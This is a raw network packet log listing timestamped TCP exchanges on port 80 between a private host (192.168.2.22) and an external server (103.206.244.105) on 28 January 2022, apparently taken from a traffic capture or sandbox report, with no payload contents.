Jan 28, 2022 20:58:56.512546062 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512563944 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512583017 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512583971 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.512602091 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512619019 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512634993 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512635946 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.512653112 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512670040 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512686014 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512702942 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512706041 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.512721062 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512737989 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512753963 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512758017 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.512773037 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512792110 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512808084 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512825012 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512840033 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512844086 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.512856960 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512873888 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512890100 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512897015 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.512907028 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512923956 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512938976 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512943983 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.512957096 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512973070 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512988091 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.513000011 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.513010025 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.513012886 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.513031006 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.513046026 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.513062954 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.513107061 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.513524055 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.691271067 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691308022 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691320896 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691334009 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691345930 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691359043 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691373110 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691389084 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691406012 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691417933 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691431046 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691442966 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691456079 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691471100 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691488028 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691500902 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691513062 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691525936 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691538095 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691560030 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691570997 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691582918 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691596031 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691596985 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.691607952 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691622019 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691636086 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691648960 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691651106 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.691663027 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691675901 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691685915 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.691689014 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691704035 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691716909 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691736937 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691740990 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.691751003 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691770077 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691786051 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691792011 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.691802979 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691816092 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691828012 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691829920 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.691842079 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691854000 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691865921 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.691878080 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.691917896 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870121956 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870152950 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870167017 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870181084 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870193958 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870210886 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870225906 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870243073 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870258093 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870277882 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870294094 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870310068 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870326996 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870341063 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870357990 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870374918 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870378017 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870390892 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870404959 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870419025 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870434046 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870450020 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870450020 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870469093 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870486975 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870502949 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870518923 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870534897 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870542049 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870551109 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870556116 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870562077 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870569944 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870587111 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870603085 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870608091 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870615959 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870620966 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870640039 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870656013 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870665073 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870675087 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870691061 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870692015 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870707035 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870719910 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870728016 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870733023 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870747089 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870760918 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870767117 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870784998 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870795012 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.870800972 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.870831013 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.871310949 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.048995018 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049026966 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049040079 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049056053 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049071074 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049088001 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049103975 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049119949 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049134970 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049144030 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049151897 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049169064 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049170017 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049189091 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049201012 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049211025 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049213886 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049232006 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049232006 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049249887 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049253941 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049268961 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049285889 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049293995 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049302101 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049319029 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049323082 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049335957 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049360991 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049391031 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049408913 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049424887 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049432993 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049441099 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049458027 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049464941 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049474955 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049490929 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049499035 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049506903 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049523115 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049530029 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049540043 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049556017 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049562931 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049571991 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049588919 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049598932 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049604893 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049623966 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049632072 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049643040 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049659014 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049663067 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049676895 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049693108 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049705982 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049706936 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049724102 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049724102 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049740076 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049756050 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049758911 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.049772024 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.049791098 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.227407932 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227525949 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227544069 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227560997 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227574110 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227586031 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227615118 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227627993 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227641106 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227669954 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227708101 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227730036 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.227746964 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227756023 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.227760077 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.227802992 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227824926 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.227833033 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227873087 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227899075 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227915049 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227927923 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.227932930 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227950096 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227958918 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.227967978 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.227986097 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228015900 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228029013 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228035927 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228035927 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228055000 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228072882 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228094101 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228108883 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228125095 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228132010 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228141069 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228147030 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228158951 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228177071 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228192091 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228208065 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228224039 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228225946 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228233099 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228239059 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228244066 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228261948 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228279114 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228280067 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228296995 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228313923 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228328943 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228344917 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228359938 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228362083 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228370905 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228378057 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228394985 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228410959 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228426933 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.228442907 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228452921 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.228707075 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407152891 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407183886 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407196045 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407211065 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407226086 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407242060 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407255888 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407270908 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407284975 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407299995 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407315969 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407330036 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407344103 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407357931 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407367945 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407372952 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407392979 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407613993 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407656908 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407672882 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407687902 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407697916 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407702923 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407704115 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407720089 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407732010 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407736063 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407752991 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407759905 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407768965 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407783985 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407799959 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407814980 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407831907 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407834053 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407839060 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407849073 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407865047 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407880068 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407896042 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407896996 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407901049 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407912016 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407924891 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407928944 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407946110 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407960892 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407975912 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.407975912 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.407993078 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408009052 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408024073 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408040047 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408046007 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.408051014 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.408056974 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408071041 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408086061 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408092022 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.408102989 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408118010 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408133030 CET	80	49168	103.206.244.105	192.168.2.22
